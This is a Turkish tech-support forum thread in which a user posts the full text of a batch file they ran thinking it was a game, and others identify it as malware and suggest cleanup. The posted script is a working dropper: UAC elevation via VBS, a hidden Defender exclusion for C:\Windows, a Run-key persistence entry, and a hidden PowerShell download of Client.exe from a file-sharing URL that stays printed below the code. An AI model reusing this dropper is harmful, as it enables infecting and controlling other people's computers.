Çalıştırılan garip kod zararlı mı?

flashrina · 17 Eylül 2024

Moderasyon Notu: Koddaki URL koddan silinip kod dışına not olarak bırakıldı.

Kod:

echo @off
set "params=%*"
cd /d "%~dp0" && ( if exist "%temp%\getadmin.vbs" del "%temp%\getadmin.vbs" ) && fsutil dirty query %systemdrive% 1>nul 2>nul || ( echo Set UAC = CreateObject^("Shell.Application"^) : UAC.ShellExecute "cmd.exe", "/k cd ""%~sdp0"" && %~s0 %params%", "", "runas", 1 >> "%temp%\getadmin.vbs" && "%temp%\getadmin.vbs" && exit /B )

powershell -w hidden -c Add-MpPreference -ExclusionPath "C:\Windows"

xasdx

xasdx

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SysWOW64" /d "\"C:\Windows\Client.exe\"" /f

timeout /t 5 /nobreak >nul

set "URL=URL_SANSÜRLENDİ"
set "DEST=C:\Windows\Client.exe"

if exist "%DEST%" del "%DEST%"

powershell -w hidden -c "(New-Object System.Net.WebClient).DownloadFile('%URL%', '%DEST%')"

if %errorlevel% neq 0 (
  exit /b %errorlevel%
)

call "%DEST%"

URL:

[URL]https://sw.lifeboxtransfer.com/v1/AUTH_LT_fc856d57-7abc-4ad2-ac90-950f9e675133/LT_03f16f95-27ac-4be0-a2ab-6b6e8b1e08d7/d7391655-43fe-4a88-8ee0-c1fe512c7210/d2049ae8-b72f-4921-bf18-4e16b8a2c8c6?temp_url_sig=a8fc7a52310627e71ff80821d6e66ef535fbe65972017101ec75d2fbcd966efb&temp_url_expires=1726081224735&filename=Client.exe[/URL]

Bir oyun sanıp bir bat dosyası çalıştırdım. TXT'si bu ne yapmıştır acaba zararlıysa nasıl silebilirim?

Emperor4231 · 17 Eylül 2024

Bir tane dosya indirip çalıştırmış. Kaspersky ile tarama yapın bulacaktır virüsü.

qureniz · 17 Eylül 2024

flashrina dedi:
Echo @off
Set "params=%*"
CD /d "%~DP0" && ( if exist "%temp%\getadmin. VBS" del "%temp%\getadmin. VBS" ) && fsutil dirty query %systemdrive% 1>nul 2>nul || ( echo set UAC = createobject^("Shell. Application"^): UAC. Shellexecute "cmd.exe", "/k CD ""%~sdp0"" && %~s0 %params%", "", "runas", 1 >> "%temp%\getadmin. VBS" && "%temp%\getadmin. VBS" && exit /b )

PowerShell -w hidden -c add-mppreference -exclusionpath "C:\windows"

Xasdx.

Xasdx.

Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SysWOW64" /d "\"C:\Windows\Client.exe\"" /f

Timeout /t 5 /nobreak >nul

Set "URL=https://sw.lifeboxtransfer.com/v1/A...url_expires=1726081224735&filename=Client.exe"
Set "DEST=C:\Windows\Client.exe"

İf exist "%dest%" del "%dest%"

PowerShell -w hidden -c "(New-object System.Net.webclient).downloadfile('%url%', '%dest%')"

İf %errorlevel% neq 0 (
Exit /b %errorlevel%
)

Call "%dest%"

Bir oyun sanıp bir BAT dosyası çalıştırdım. Txt'si bu ne yapmıştır acaba zararlıysa nasıl silebilirim?

Bilgisayarınıza bir şeyler indirmiş bende yemiştim buna benzer PC'yi her başlattığımda bu geliyor Regedit yazıp kayıt defter düzenleyicisini açıp şunu taratır mısınız HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Disty · 17 Eylül 2024

Virüslü bir dosyayı C:\Windows\Client.exe konumuna indirip çalıştırıyor.

İndirdiği dosyanın VirüsTotal linki: VirusTotal

flashrina · 17 Eylül 2024

qureniz dedi:
Bilgisayarınıza bir şeyler indirmiş bende yemiştim buna benzer PC'yi her başlattığımda bu geliyor Regedit yazıp kayıt defter düzenleyicisini açıp şunu taratır mısınız HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Buyurun.

regeditteki syswow dosyasini duzenlemis onu sildim
bide c windowstaki client exe yi sildim başka bişi yapmam lazım mı

qureniz · 17 Eylül 2024

flashrina dedi:
Buyurun.

Regedit'teki SysWOW dosyasini duzenlemis onu sildim.
Bir de C Windows'taki Client EXE'yi sildim başka bir şey yapmam lazım mı?

Kaspersky ile taratın bende taratım 10 tane bir şeyler sildi Edge dosyalarındada bir şey var Kaspersky Ücretsiz antivirüs indirin | Kaspersky ücretsiz indirebilirsiniz.

Çalıştırılan garip kod zararlı mı?

Ayrıntılı düzenleme

flashrina

Hectopat

Emperor4231

Megapat

qureniz

Centipat

Disty

Gigapat

flashrina

Hectopat

Dosya Ekleri

qureniz

Centipat

Benzer konular

Technopat Haberler

Yeni konular

Yeni mesajlar

Gizliliğinize önem veriyoruz